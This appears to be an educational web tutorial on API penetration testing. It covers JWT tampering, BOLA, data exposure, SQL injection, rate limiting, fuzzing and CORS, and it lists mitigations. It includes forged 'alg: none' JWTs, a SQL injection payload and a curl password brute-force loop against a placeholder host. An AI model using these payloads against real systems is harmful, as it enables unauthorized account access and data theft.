API Penetration Testing: Common Vulnerabilities & Exploits

API Penetration Testing: Common Vulnerabilities & Exploits

Comprehensive guide to identifying and exploiting vulnerabilities in API endpoints

⚠️ Ethical Disclaimer: This guide is for educational purposes only. Only test systems you own or have explicit permission to test. Unauthorized testing is illegal.

Introduction to API Penetration Testing

APIs (Application Programming Interfaces) are critical components of modern applications, enabling communication between services. However, their exposure makes them prime targets for attackers. API penetration testing involves identifying and exploiting vulnerabilities to ensure robust security.

Common API Vulnerabilities

1. Broken Authentication

Weak authentication mechanisms allow attackers to impersonate users or gain unauthorized access.

Vulnerability Example Risk
Weak JWT Validation alg: none in JWT header Unauthorized access
Predictable Tokens user_id=123 Account takeover
Credential Stuffing Brute-forcing API endpoints Mass account compromise
JWT Manipulation Example
# Original JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0.signature

# Modified JWT (change role to admin)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ0.signature

# Bypassing signature validation
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ0.

2. Broken Object Level Authorization (BOLA)

BOLA occurs when an API fails to verify user permissions, allowing access to unauthorized resources.

BOLA Exploit Example
# Request to access another user's data
GET /api/users/456 HTTP/1.1
Host: vulnerable-api.com
Authorization: Bearer user_token_123

# Response (should be forbidden but returns data)
{
  "id": 456,
  "email": "victim@example.com",
  "sensitive_data": "credit_card_info"
}

3. Excessive Data Exposure

APIs may return more data than necessary, exposing sensitive information.

Excessive Data Exposure Example
# Request
GET /api/users/123 HTTP/1.1
Host: vulnerable-api.com

# Response (includes sensitive fields)
{
  "id": 123,
  "name": "John Doe",
  "email": "john@example.com",
  "password_hash": "hashed_password",
  "ssn": "123-45-6789"
}

4. Injection Attacks

APIs that process user input without validation are vulnerable to injection attacks like SQL, NoSQL, or command injection.

SQL Injection Example
# Malicious request
POST /api/search HTTP/1.1
Host: vulnerable-api.com
Content-Type: application/json

{
  "query": "1' OR '1'='1"
}

# Response (dumps entire database)
{
  "results": [
    {"id": 1, "username": "admin", ...},
    {"id": 2, "username": "user", ...}
  ]
}

5. Improper Rate Limiting

Lack of rate limiting allows attackers to brute-force endpoints or cause denial-of-service (DoS).

Brute-Force Example
# Script to brute-force login
for password in $(cat passwords.txt); do
  curl -X POST https://vulnerable-api.com/api/login \
    -d "{\"username\":\"admin\",\"password\":\"$password\"}"
done

Exploitation Techniques

1. Fuzzing API Endpoints

Fuzzing involves sending unexpected inputs to discover hidden endpoints or vulnerabilities.

Fuzzing with ffuf
ffuf -w wordlist.txt -u https://vulnerable-api.com/api/FUZZ -H "Authorization: Bearer token"
# Common findings: /admin, /debug, /metrics

2. Parameter Tampering

Manipulating query parameters or request bodies to bypass restrictions.

Parameter Tampering Example
# Original request
GET /api/orders?user_id=123 HTTP/1.1
Host: vulnerable-api.com

# Tampered request
GET /api/orders?user_id=456 HTTP/1.1
Host: vulnerable-api.com

3. Exploiting Misconfigured CORS

Misconfigured Cross-Origin Resource Sharing (CORS) can allow unauthorized domains to access API resources.

CORS Exploit Example
# Malicious HTML

Mitigation Techniques

For Developers:

  • Implement strong authentication (e.g., OAuth 2.0, JWT with proper validation)
  • Enforce object-level authorization checks
  • Filter and sanitize all inputs to prevent injection
  • Use rate limiting and throttling
  • Return only necessary data in responses
  • Configure CORS securely
  • Regularly audit API endpoints with tools like OWASP ZAP or Burp Suite

For Pentesters:

Test all API endpoints, including undocumented ones. Pay attention to authentication, authorization, and input validation. Use tools like Postman, Burp Suite, or custom scripts for thorough testing.

Conclusion

API penetration testing is critical for securing modern applications. By understanding common vulnerabilities and exploitation techniques, developers and pentesters can build and test robust APIs.

Further Resources

Similar Posts

Leave a Reply